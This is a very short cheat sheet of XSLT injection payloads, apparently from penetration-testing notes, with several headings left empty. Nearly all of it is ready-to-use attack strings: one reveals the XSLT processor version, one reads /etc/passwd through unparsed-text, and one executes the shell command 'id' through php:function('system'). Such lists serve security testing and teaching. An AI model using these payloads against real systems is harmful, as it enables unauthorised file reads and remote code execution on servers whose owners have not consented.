XSLT Injection
Common XSLT Elements:
XSLT Injection Payloads:
Information Disclosure:
<xsl:value-of select="system-property('xsl:version')" />Local File Inclusion (LFI):
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />Remote Code Execution (RCE):
<xsl:value-of select="php:function('system','id')" />Advanced XSLT Exploits:
Last updated